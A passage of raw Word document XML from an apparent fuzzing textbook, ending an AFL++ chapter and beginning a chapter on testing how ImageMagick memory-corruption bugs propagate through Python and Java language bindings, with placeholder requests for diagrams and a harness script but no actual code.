        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Performance degradation represents another critical reliability threat that memory corruption fuzzing cannot address. Applications might process certain inputs correctly but consume exponential time or memory during processing. These algorithmic complexity vulnerabilities can bring down services just as effectively as crashes, yet they require different detection techniques that monitor resource consumption rather than memory safety.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The next chapter expands your toolkit with libFuzzer, which complements AFL++ by providing different exploration strategies and integration patterns that excel in scenarios where AFL++'s file-based approach proves less effective. While AFL++ excels at exploring complex program states through file-based input processing, libFuzzer specializes in high-throughput testing of library functions and API endpoints that require different approaches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">libFuzzer’s persistent execution model eliminates process startup overhead entirely, enabling millions of test cases per second that discover subtle bugs requiring extensive exploration to trigger reliably. This performance advantage makes libFuzzer particularly effective for discovering edge cases in fundamental components that could affect multiple applications simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll learn to build libFuzzer harnesses that test library functions directly, bypassing application-level input parsing to focus on core logic vulnerabilities that hide beneath the surface. This approach discovers bugs in foundational components while demonstrating how the same coverage-guided principles you’ve mastered with AFL++ apply across different tools and execution models.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">libFuzzer integrates seamlessly with AddressSanitizer, UndefinedBehaviorSanitizer, and other runtime analysis tools that catch subtle bugs before they manifest as visible crashes. This integration enables discovery of vulnerabilities that might remain dormant in production until specific conditions trigger their exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The harness development patterns you’ve learned with AFL++ translate directly to libFuzzer with syntax adaptations. The same principles of focusing on input processing logic, maintaining clean state between iterations, and optimizing for coverage apply regardless of the underlying fuzzing engine. This consistency accelerates your learning while building comprehensive fuzzing expertise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Understanding both AFL++ and libFuzzer provides the flexibility to choose the right tool for each fuzzing challenge, optimizing your crash discovery effectiveness while building comprehensive reliability testing programs. Some applications respond better to AFL++'s file-based mutation strategies, while others benefit from libFuzzer’s function-level testing approach.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="137"/>
    <w:bookmarkStart w:id="138" w:name="Xe3ca3461f4fcb2e4e9a671e2bb1a498a9f7100a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your Fuzzing Journey Continues</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your fuzzing education progresses through hands-on libFuzzer campaigns that will discover new categories of vulnerabilities while reinforcing the fundamental concepts you’ve mastered in this chapter. Each tool you learn multiplies your ability to find reliability issues across different application architectures and input processing patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The coverage-guided fuzzing principles you’ve internalized—​feedback-driven exploration, intelligent mutation, and systematic crash analysis—​remain constant as you expand to new tools and techniques. This conceptual foundation enables rapid adoption of additional fuzzing approaches while maintaining the analytical rigor needed for effective vulnerability discovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your growing fuzzing toolkit will eventually include specialized tools for network protocols, web applications, mobile platforms, and cloud services. Each addition builds upon the systematic approach you’ve developed, extending your reach into new application domains while maintaining consistent methodology.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The integration patterns you’ve established—​Docker environments, automated analysis, workflow integration—​scale naturally to accommodate additional tools and techniques. Your infrastructure investment pays dividends as you add capabilities without rebuilding foundational systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Most importantly, you’ve developed the mindset that views systematic crash discovery as an essential component of software reliability engineering rather than an optional security activity. This perspective transforms how you approach application development, testing, and deployment across your entire career.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="138"/>
    <w:bookmarkStart w:id="139" w:name="X66179a0ab14f11033fb5531a1d4525b578a6332"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Path Forward</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The journey from basic crash discovery to comprehensive reliability testing has begun, and your most impactful discoveries lie ahead. You’ve mastered the foundation—​now it’s time to build upon it with advanced techniques that will transform how you think about application reliability and systematic vulnerability discovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your next chapter awaits, where libFuzzer will teach you new approaches to the same fundamental challenge: finding the bugs that threaten your services before your users encounter them. The principles remain the same, but the techniques expand, giving you more powerful ways to protect the applications you build and maintain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The crashes you discover tomorrow will prevent the outages that never happen, the vulnerabilities that never get exploited, and the reliability issues that never impact your users. This is the true value of systematic fuzzing—​not just finding bugs, but preventing the problems that matter most to the people who depend on your software.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:pp: ++</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="139"/>
    <w:bookmarkEnd w:id="140"/>
    <w:bookmarkStart w:id="150" w:name="X186e724f1785465bbbe0a838b3d49a3461c5f48"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 5: Cross-Language Application Security - FFI Boundary Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Discovering the hidden crashes that occur when memory corruption in native libraries propagates into managed language applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remember when AFL++ made headlines by finding over 100 vulnerabilities in ImageMagick? Those weren’t academic exercises—​they were real memory corruption bugs affecting millions of applications worldwide. But here’s what the security community missed: most production systems don’t call ImageMagick directly from C++. They call it through Python bindings, Java wrappers, or Node.js interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your Python web application processes user image uploads and crashes occur, but the crash traces point to ImageMagick C++ code. Traditional debugging focuses on the native crash, missing how that memory corruption affects your Python application’s stability. When AFL++ crashes the C++ library, what happens to the Python process that called it? Does it crash gracefully, or does memory corruption propagate upward, causing data corruption or service instability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These Foreign Function Interface (FFI) boundary vulnerabilities represent a significant class of cross-language security issues that traditional testing approaches often miss. You’ve mastered AFL++ for testing native binaries and libFuzzer for testing libraries in isolation. Now you need to understand how those crashes behave when they occur inside Python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ctypes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">calls, Java JNI interfaces, or other language bindings that bridge the gap between memory-safe and memory-unsafe code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This chapter teaches you to find and understand FFI boundary vulnerabilities using real targets like ImageMagick, which provides concrete examples of how memory corruption in native libraries affects calling applications written in higher-level languages. You’ll discover how a double-free crash in C++ becomes a Python interpreter crash, how integer overflow in native code triggers Java heap corruption, and practical techniques for testing these boundaries before they cause production outages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By the end of this chapter, you’ll know how to use AFL++ to discover native library vulnerabilities, then test how those same crashes affect applications that call the library through language bindings. You’ll understand common failure modes that occur at FFI boundaries and build focused testing approaches that reveal the actual impact of native code vulnerabilities on your polyglot applications.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="141" w:name="Xb9f33b4f977e8cb0aed45bfa2ec70ca595f21ef"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 The FFI Security Boundary Problem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your Python web application handles user image uploads without crashes. Your ImageMagick C++ library processes images correctly when tested in isolation with AFL++. Yet when users upload certain malformed images to your production system, the entire Python process crashes with memory corruption errors that seem unrelated to your application code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This scenario illustrates why Foreign Function Interfaces create a significant security paradox in modern application architecture. Languages like Python, Java, and JavaScript provide memory safety, garbage collection, and exception handling that protect against many classes of vulnerabilities. Yet when these languages call into native C/C++ libraries through FFI mechanisms, they inherit memory corruption risks of the underlying native code—​often in unexpected ways.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When should you test FFI boundaries rather than just testing native libraries in isolation? The answer depends on how your application uses native libraries and what happens when those libraries experience memory corruption during normal operation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consider your typical Python web application that processes user-uploaded images. The Python code itself is memory-safe: you can’t trigger buffer overflows, use-after-free conditions, or double-free crashes through pure Python operations. But the moment your code calls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PIL.Image.open()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or uses the Wand library to process images, you’re executing native ImageMagick code written in C++. If that ImageMagick code contains memory corruption vulnerabilities—​and AFL++ has demonstrated that it contains many—​then your "memory-safe" Python application suddenly becomes vulnerable to native code exploits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The security risk extends beyond simple crashes. When native code corrupts memory inside a Python process, the corruption can affect Python’s own memory management structures, leading to interpreter instability that manifests as seemingly random crashes hours or days after the initial trigger. Java applications face similar risks: memory corruption in JNI code can corrupt the Java virtual machine’s internal structures, causing garbage collection failures, heap corruption, or complete JVM crashes that take down entire application servers.</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DIAGRAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FFI Vulnerability Propagation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Shows how memory corruption in C++ ImageMagick propagates through Python/Java bindings to affect application stability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Create a detailed flow diagram showing the path from AFL++ input through ImageMagick C++ code to memory corruption that affects Python interpreter or JVM stability.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These FFI boundary vulnerabilities often go undetected during traditional security testing because they require specific conditions to manifest. The native library might crash cleanly when tested in isolation with AFL++, but when the same vulnerability triggers inside a Python or Java process, the crash behavior changes dramatically. Memory corruption that causes a segmentation fault in standalone C++ code might cause a double-free error when the Python garbage collector attempts to clean up corrupted objects. Integer overflow that causes predictable behavior in C++ might trigger heap corruption when Java’s memory management system interacts with the corrupted native memory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Understanding FFI vulnerability patterns requires recognizing how different language runtimes interact with native code. Python’s reference counting system means that memory corruption in native code can affect object lifecycle management, leading to use-after-free conditions that don’t exist when the same code runs standalone. Java’s garbage collection means that native memory corruption might not manifest until the next GC cycle, creating timing-dependent crashes that are extremely difficult to debug without understanding the underlying native vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The challenge multiplies when you consider that most applications don’t just call native libraries—​they call native libraries that call other native libraries. Your Python application might use the Pillow library to process images, which calls ImageMagick through C++ bindings, which then calls additional native libraries for specific image format support. A vulnerability anywhere in this chain can propagate upward through multiple layers of FFI boundaries, each adding its own failure modes and crash propagation characteristics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modern containerized and microservices architectures amplify FFI boundary risks by making crash propagation less visible. When a Python service crashes due to ImageMagick memory corruption, container orchestration systems typically restart the service automatically, masking the underlying security vulnerability while potentially leaving corrupt data in databases or message queues. These hidden crashes can accumulate over time, leading to data integrity issues that are far more severe than the original memory corruption vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The security implications become particularly serious when you realize that FFI vulnerabilities often bypass traditional security controls. Web application firewalls, input validation frameworks, and many security monitoring tools focus on application-layer attacks and don’t detect memory corruption vulnerabilities triggered through image processing, document parsing, or other native library functionality. An attacker who discovers how to trigger ImageMagick memory corruption through carefully crafted image uploads can potentially compromise Python or Java applications that would otherwise be immune to memory corruption attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This creates a critical testing gap in most security programs. Organizations invest heavily in application security testing, dynamic analysis, and static code analysis for their Python, Java, and JavaScript applications. They might even fuzz their native C++ components separately. But few systematically test the FFI boundaries where these components interact—​exactly where the most dangerous and unexpected vulnerabilities often hide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Closing this gap requires understanding both the native vulnerabilities and how they behave when triggered through language bindings. You need testing approaches that use AFL++ to find native library crashes, then verify how those same crashes affect real applications that call the library through FFI mechanisms. The goal isn’t just finding crashes in ImageMagick—​it’s understanding how ImageMagick crashes affect your production Python services, Java applications, or Node.js APIs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now that you understand why FFI boundaries create unique security risks, let’s examine how to discover these vulnerabilities using Python and ImageMagick as a concrete example.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="141"/>
    <w:bookmarkStart w:id="142" w:name="Xd233c4ad45003bca12dba6f4febc331cff77933"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Python FFI Vulnerability Discovery with ImageMagick</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your Python web application crashes when processing certain user-uploaded images, but the crash traces point to ImageMagick C++ code rather than your Python application. Standard AFL++ testing of ImageMagick in isolation finds memory corruption bugs, but how do you know which of those bugs actually affect your Python application? More importantly, how do you test whether memory corruption in ImageMagick causes problems beyond simple crashes when it occurs inside your Python process?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Python’s integration with native libraries through mechanisms like</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ctypes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, SWIG-generated bindings, and Cython extensions creates attack surfaces where memory corruption in C++ code can trigger complex failure scenarios in the Python interpreter. ImageMagick provides a practical target for understanding these dynamics because it’s widely deployed, heavily used through Python bindings like Wand and PythonMagick, and has a documented history of memory corruption vulnerabilities discovered through AFL++ testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Why test FFI boundaries rather than just fuzzing ImageMagick directly? The answer lies in understanding that memory corruption behaves differently when it occurs inside a managed language runtime versus standalone native code execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When you call ImageMagick functions through Python bindings, you’re not just risking crashes in the native library—​you’re creating opportunities for memory corruption to interact with Python’s reference counting system, object lifecycle management, and memory allocation strategies in ways that can trigger interpreter instability, data corruption, or exploitation scenarios that wouldn’t exist if the same code ran in standalone C++.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A common FFI vulnerability pattern involves double-free conditions that emerge when ImageMagick’s memory management conflicts with Python’s object cleanup mechanisms. AFL++ might discover an input that causes ImageMagick to incorrectly free the same memory region twice, which would typically result in a clean crash when testing the library in isolation. But when the same vulnerability triggers inside a Python process, Python’s garbage collector might attempt to free objects that reference the already-freed memory, leading to complex crash scenarios that can corrupt the interpreter’s internal state.</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Python ImageMagick FFI Fuzzer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AFL++ harness that tests ImageMagick vulnerabilities through Python Wand bindings, specifically targeting double-free scenarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Create a Python script that uses AFL++ to fuzz ImageMagick through the Wand library, monitoring for memory corruption that affects Python interpreter stability beyond simple crashes.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Building effective Python FFI fuzzing requires understanding how Python manages memory for objects that wrap native resources. When your Python code creates a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Wand.Image</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">object, Python allocates memory for the Python object while ImageMagick allocates separate memory for the actual image data and processing structures. Memory corruption in ImageMagick can break the assumptions that Python’s reference counting system makes about object validity, leading to crashes when Python attempts to decrement reference counts for corrupted objects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The challenge with Python FFI vulnerability discovery is that crashes often manifest differently than they would in pure C++ testing. A use-after-free vulnerability in ImageMagick might cause immediate crashes when tested with AFL++ in isolation, but when triggered through Python bindings, the crash might be delayed until Python’s garbage collector runs, creating timing-dependent failures that are difficult to reproduce and analyze. This means your fuzzing approach must account for Python’s execution model and memory management characteristics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Resource exhaustion attacks represent another critical class of Python FFI vulnerabilities that AFL++ can help discover. ImageMagick operations that consume excessive memory or processing time can interact with Python’s Global Interpreter Lock (GIL) in ways that cause application-wide hangs or crashes. When AFL++ generates inputs that trigger algorithmic complexity attacks in ImageMagick—​such as images with pathological compression ratios or recursive parsing structures—​the resulting resource consumption can destabilize the entire Python process, not just the image processing operation.</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DIAGRAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Python Memory Corruption Propagation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Detailed view of how ImageMagick double-free vulnerabilities affect Python’s reference counting and garbage collection systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Design a technical diagram showing the flow from AFL++ test case through ImageMagick memory corruption to Python interpreter instability, highlighting the specific points where native crashes affect Python memory management.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exception handling boundaries provide another attack surface where ImageMagick vulnerabilities can affect Python application security. Python applications typically wrap native library calls in try-catch blocks, expecting that crashes in native code will be translated into Python exceptions that can be handled gracefully. However, certain types of memory corruption can bypass Python’s exception handling mechanisms, causing crashes that propagate directly to the interpreter level without giving application code an opportunity to respond appropriately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">String handling represents a particularly rich source of Python FFI vulnerabilities when working with ImageMagick. AFL++ can generate test cases that trigger buffer overflows in ImageMagick’s string processing functions, but when these vulnerabilities trigger through Python bindings, the corruption can affect Python’s string object management. Since Python strings are immutable and heavily cached, corruption in string objects can have far-reaching effects throughout the interpreter, affecting unrelated parts of the application that happen to reference the same corrupted string data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The debugging and analysis workflow for Python FFI vulnerabilities differs significantly from standalone native library testing. When AFL++ discovers a crash in pure C++ code, you can analyze the crash with GDB, examine core dumps, and use standard native debugging techniques. But when the same vulnerability triggers through Python bindings, you need debugging approaches that understand both the native crash and its effects on the Python interpreter. This often requires specialized tools and techniques that can trace memory corruption across the FFI boundary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploitation implications change dramatically when ImageMagick vulnerabilities trigger through Python bindings rather than standalone native code. While a buffer overflow in standalone ImageMagick might allow code execution at the native level, the same vulnerability triggered through Python can potentially affect Python’s import system, module loading mechanisms, or interpreter state in ways that create new exploitation opportunities. Understanding these Python-specific attack vectors requires testing that goes beyond simply finding native crashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These Python FFI testing techniques also apply to other file parsing libraries like libxml2 or multimedia processing libraries, where similar double-free and resource exhaustion patterns emerge at FFI boundaries. The key insights—​monitoring garbage collection patterns, correlating native crashes with Python interpreter effects, and building appropriate test harnesses—​transfer directly to any Python application that calls native libraries for complex data processing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You now understand how to discover FFI vulnerabilities in Python applications using ImageMagick as your testing target. These same cross-boundary crash propagation patterns appear in Java environments, but with JVM-specific manifestations that require different detection and analysis approaches.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="142"/>
    <w:bookmarkStart w:id="143" w:name="X3ba40b31631556b1c11126691a8e1c8e10c3624"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 Java JNI Vulnerability Discovery with ImageMagick</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your Java application server crashes during image processing operations, but the crashes don’t follow normal Java exception handling patterns. Instead of getting predictable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OutOfMemoryError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">IOException</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exceptions that your application can catch and handle, you’re seeing JVM crashes that take down the entire application server. Standard AFL++ testing finds integer overflow vulnerabilities in ImageMagick, but how do you determine whether those vulnerabilities can actually compromise your Java application when triggered through JNI calls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Java’s security model provides strong memory safety guarantees through automatic memory management, bytecode verification, and runtime security checks. However, Java Native Interface (JNI) calls create direct pathways for native code vulnerabilities to compromise these protections, often in ways that are more severe and harder to detect than equivalent vulnerabilities in pure native applications. When ImageMagick vulnerabilities trigger through Java bindings like JMagick or im4java, they can corrupt not just application data, but the JVM’s internal structures, leading to heap corruption, garbage collection failures, or complete virtual machine crashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
